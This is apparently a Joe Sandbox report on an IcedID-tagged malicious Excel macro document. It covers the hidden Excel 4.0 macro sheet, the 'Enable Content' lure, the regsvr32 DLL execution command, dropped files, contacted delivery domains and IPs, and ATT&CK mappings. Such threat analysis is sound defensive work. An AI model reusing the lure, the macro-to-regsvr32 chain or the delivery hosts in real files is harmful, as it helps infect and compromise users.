Play interactive tour

Edit tour

Analysis Report documents-1819557117.xlsm

Overview

General Information

Sample Name:	documents-1819557117.xlsm
Analysis ID:	384703
MD5:	4dd14d22cd0272ae24128bb1356a842c
SHA1:	abf7d941f4ebf949816c5576060bfce76f836ae9
SHA256:	f06910daadc7c66c8e9064d0719ed6727d69c1f04ab13566cadbb6e7a9f52a7e
Tags:	IcedIDXLSM
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Office process drops PE file

Allocates a big amount of memory (probably used for heap spraying)

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Excel documents contains an embedded macro which executes code when the document is opened

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Yara detected Xls With Macro 4.0

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1820 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

regsvr32.exe (PID: 2376 cmdline: regsvr32 -s ..\ghnrope MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2032 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2312 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 284 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2668 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 162.251.80.27:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.222.38.97:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.201.252.173:443 -> 192.168.2.22:49171 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\ghnrope2.dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: 0604[1].gif.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Source: excel.exe

Memory has grown: Private usage: 4MB later: 127MB

Source: global traffic

DNS query: name: runolfsson-jayde07s.ru.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 162.251.80.27:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 8.211.4.209:80

Source: Joe Sandbox View	IP Address: 162.251.80.27 162.251.80.27
Source: Joe Sandbox View	IP Address: 8.211.4.209 8.211.4.209

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /ind.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: runolfsson-jayde07s.ru.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ind.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cremin-ian07u.ru.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3318F1C.png

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /ind.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: runolfsson-jayde07s.ru.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ind.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cremin-ian07u.ru.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: runolfsson-jayde07s.ru.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Fri, 09 Apr 2021 14:26:04 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16X-Powered-By: PHP/5.4.16Content-Length: 76Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000003.00000002.2094056322.0000000001C60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2094739099.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2095539917.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2096281852.0000000001BF0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2097377192.0000000001D10000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443

Source: unknown	HTTPS traffic detected: 162.251.80.27:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.222.38.97:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.201.252.173:443 -> 192.168.2.22:49171 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
Source: Screenshot number: 4	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: documents-1819557117.xlsm	Initial sample: CALL
Source: documents-1819557117.xlsm	Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: documents-1819557117.xlsm

Initial sample: Sheet size: 24417

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ghnrope2.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gif			Jump to dropped file

Source: workbook.xml

Binary string: " sheetId="6" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/><sheet name="Doc3" sheetId="5" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$AO$28</definedName></definedNames><calcPr calcId="122211"/></workbook>

Source: classification engine

Classification label: mal88.expl.evad.winXLSM@11/18@6/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$documents-1819557117.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC0EE.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\ghnrope
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\ghnrope	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: documents-1819557117.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: documents-1819557117.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: documents-1819557117.xlsm	Initial sample: OLE zip file path = xl/media/image3.png
Source: documents-1819557117.xlsm	Initial sample: OLE zip file path = xl/media/image4.png
Source: documents-1819557117.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: documents-1819557117.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: documents-1819557117.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: documents-1819557117.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ghnrope2.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gif			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\ghnrope2.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gif

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\ghnrope2.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\ghnrope2.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gif			Jump to dropped file

Source: Yara match

File source: app.xml, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting21	Path Interception	Process Injection1	Masquerading121	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution43	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Disable or Modify Tools1	LSASS Memory	System Information Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol14	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting21	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Extra Window Memory Injection1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
cesiroinsurance.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://runolfsson-jayde07s.ru.com/ind.html	0%	Avira URL Cloud	safe
http://cremin-ian07u.ru.com/ind.html	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
runolfsson-jayde07s.ru.com	8.211.4.209	true	false		unknown
cremin-ian07u.ru.com	8.211.4.209	true	false		unknown
cesiroinsurance.com	67.222.38.97	true	false	0%, Virustotal, Browse	unknown
shalombaptistchapel.com	162.251.80.27	true	false		unknown
innermetransformation.com	173.201.252.173	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://runolfsson-jayde07s.ru.com/ind.html	false	Avira URL Cloud: safe	unknown
http://cremin-ian07u.ru.com/ind.html	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://servername/isapibackend.dll	regsvr32.exe, 00000003.00000002.2094056322.0000000001C60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2094739099.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2095539917.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2096281852.0000000001BF0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2097377192.0000000001D10000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
162.251.80.27	shalombaptistchapel.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
67.222.38.97	cesiroinsurance.com	United States	46606	UNIFIEDLAYER-AS-1US	false
173.201.252.173	innermetransformation.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	false
8.211.4.209	runolfsson-jayde07s.ru.com	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	384703
Start date:	09.04.2021
Start time:	16:25:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	documents-1819557117.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.expl.evad.winXLSM@11/18@6/4
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Excluded IPs from analysis (whitelisted): 192.35.177.64, 23.0.174.185, 23.0.174.200 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.251.80.27	SecuriteInfo.com.Heur.17834.xls	Get hash	malicious	Browse	immanta.com/zrqzfrsvu/3806249.jpg
	SecuriteInfo.com.Heur.9646.xls	Get hash	malicious	Browse	immanta.com/zrqzfrsvu/3806249.jpg
	SecuriteInfo.com.Heur.17834.xls	Get hash	malicious	Browse	immanta.com/zrqzfrsvu/3806249.jpg
	SecuriteInfo.com.Heur.9646.xls	Get hash	malicious	Browse	immanta.com/zrqzfrsvu/3806249.jpg
	Claim-2016732059-02092021.xls	Get hash	malicious	Browse	immanta.com/zrqzfrsvu/3806249.jpg
	Claim-2016732059-02092021.xls	Get hash	malicious	Browse	immanta.com/zrqzfrsvu/3806249.jpg
	Claim-1610138277-02092021.xls	Get hash	malicious	Browse	immanta.com/zrqzfrsvu/3806249.jpg
	Claim-1610138277-02092021.xls	Get hash	malicious	Browse	immanta.com/zrqzfrsvu/3806249.jpg
	Claim-1361835343-02092021.xls	Get hash	malicious	Browse	immanta.com/zrqzfrsvu/3806249.jpg
	Claim-1361835343-02092021.xls	Get hash	malicious	Browse	immanta.com/zrqzfrsvu/3806249.jpg
	Claim-495018568-02092021.xls	Get hash	malicious	Browse	immanta.com/zrqzfrsvu/3806249.jpg
8.211.4.209	documents-2112491607.xlsm	Get hash	malicious	Browse	corwin-tommie06f.ru.com/index.html
	documents-1660683173.xlsm	Get hash	malicious	Browse	corwin-tommie06f.ru.com/index.html
	1234.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif
	12345.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif
	1234.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif
	documents-748443571.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif
	12345.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif
	documents-1887159634.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif
	documents-748443571.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif
	documents-1887159634.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif
	documents-683917632.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif
	documents-683917632.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif
	documents-1760163871.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif
	documents-1760163871.xlsm	Get hash	malicious	Browse	mills-skyla30ec.com/gg.gif

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	usd 420232.exe	Get hash	malicious	Browse	208.91.199.225
	P037725600.exe	Get hash	malicious	Browse	208.91.199.225
	VAT INVOICE.exe	Get hash	malicious	Browse	208.91.199.224
	VAT INVOICE.exe	Get hash	malicious	Browse	208.91.199.224
	NEW ORDER.exe	Get hash	malicious	Browse	208.91.198.143
	TRANSFERENCIA AL EXTERIOR U810295.exe	Get hash	malicious	Browse	208.91.198.143
	PAYMENT SWIFT COPY MT103.exe	Get hash	malicious	Browse	208.91.198.143
	UPDATED SOA.exe	Get hash	malicious	Browse	208.91.199.224
	BANK PAYMENT.exe	Get hash	malicious	Browse	208.91.199.224
	document-1245492889.xls	Get hash	malicious	Browse	5.100.155.169
	VAT INVOICE.exe	Get hash	malicious	Browse	208.91.199.224
	IMG_00000000001.PDF.exe	Get hash	malicious	Browse	208.91.198.143
	documents-2112491607.xlsm	Get hash	malicious	Browse	111.118.215.222
	FED8GODpaD.xlsb	Get hash	malicious	Browse	5.100.152.162
	New Order PO#121012020_____PDF_______.exe	Get hash	malicious	Browse	208.91.199.225
	document-1251000362.xlsm	Get hash	malicious	Browse	199.79.62.99
	document-1251000362.xlsm	Get hash	malicious	Browse	199.79.62.99
	document-1055791644.xls	Get hash	malicious	Browse	103.50.162.157
	catalogue-41.xlsb	Get hash	malicious	Browse	5.100.152.162
	documents-1660683173.xlsm	Get hash	malicious	Browse	111.118.215.222
UNIFIEDLAYER-AS-1US	PRODUCT LIST.exe	Get hash	malicious	Browse	50.116.93.102
	SecuriteInfo.com.Artemis54F04621A697.21964.exe	Get hash	malicious	Browse	192.185.113.153
	Purchase Order.xlsx	Get hash	malicious	Browse	162.241.94.163
	PO.exe	Get hash	malicious	Browse	50.87.196.173
	Purchase Order.exe	Get hash	malicious	Browse	50.87.196.120
	GS_ PO NO.1862021.exe	Get hash	malicious	Browse	192.185.90.36
	Offline_record_ON-035107.htm	Get hash	malicious	Browse	162.241.69.166
	Ref. PDF IGAPO17493.exe	Get hash	malicious	Browse	70.40.220.70
	Quotation.exe	Get hash	malicious	Browse	162.241.24.122
	RFQ_AP65425652_032421 isu-isu,pdf.exe	Get hash	malicious	Browse	162.241.244.61
	PaymentAdvice.exe	Get hash	malicious	Browse	108.167.140.96
	PRODUCT_INQUIRY_PO_0009044_PDF.exe	Get hash	malicious	Browse	192.185.164.148
	PO.exe	Get hash	malicious	Browse	162.241.24.122
	0BAdCQQVtP.exe	Get hash	malicious	Browse	74.220.199.6
	TazxfJHRhq.exe	Get hash	malicious	Browse	192.185.48.194
	vbc.exe	Get hash	malicious	Browse	50.87.195.61
	PRICE_QUOTATION_RFQ_000988_PDF.exe	Get hash	malicious	Browse	192.185.164.148
	PaymentAdvice.exe	Get hash	malicious	Browse	198.57.149.44
	PRC-20-518 ORIGINAL.xlsx	Get hash	malicious	Browse	162.241.61.249
	Aveo 742.html	Get hash	malicious	Browse	162.241.124.93

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	IMAGE20210406_490133692.exe.exe	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
